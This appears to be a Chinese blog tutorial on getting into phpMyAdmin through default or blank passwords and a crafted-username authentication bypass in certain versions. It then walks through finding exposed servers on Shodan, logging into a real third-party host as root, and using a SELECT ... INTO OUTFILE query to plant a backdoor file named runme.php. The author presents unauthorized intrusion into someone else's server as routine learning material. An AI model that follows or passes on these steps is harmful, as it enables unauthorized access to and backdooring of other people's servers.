phpMyAdmin通过密码漏洞留后门文件

php  /  管理员 发布于 4年前   238

• 默认 phpMyAdmin：用户名 root 密码 root 或空登陆。
• 版本 2.11.3～2.11.4：用户名 'localhost'@'@" 登陆，无需密码。
• 版本 2.11.9.2：用户名 root 登陆，无需密码。

经测试，第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有没有不需要密码登陆的，逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的（浙江省・杭州市）。

地址已手动打码。

http://121.***.*.219:80/

登陆成功（root 权限）。

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "" into outfile "后门文件的绝对路径"

点击运行，不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了，希望本文的内容对大家的学习或者工作具有一定的参考学习价值，谢谢大家的支持。如果你想了解更多相关内容请查看下面相关链接

您可能感兴趣的文章:

• Linux基于php-fpm模式的lamp搭建phpmyadmin的方法
• CentOs 7.*中配置安装phpMyAdmin的完整步骤记录
• Ubuntu 17.10安装phpMyAdmin数据库管理工具配置详解
• 利用phpmyadmin设置mysql的权限方法
• 详解phpmyadmin相关配置与错误解决
• centos下安装配置phpMyAdmin的方法步骤
• phpmyadmin下载、安装、配置教程
• phpMyAdmin无法登陆的解决方法
• MySql修改密码后phpMyAdmin无法登陆的解决方法
• 解决mySQL中1862(phpmyadmin)/1820(mysql)错误的方法
• php集成安装包wampserver修改密码后phpmyadmin无法登陆的解决方法
• PhpMyAdmin 配置文件现在需要一个短语密码的解决方法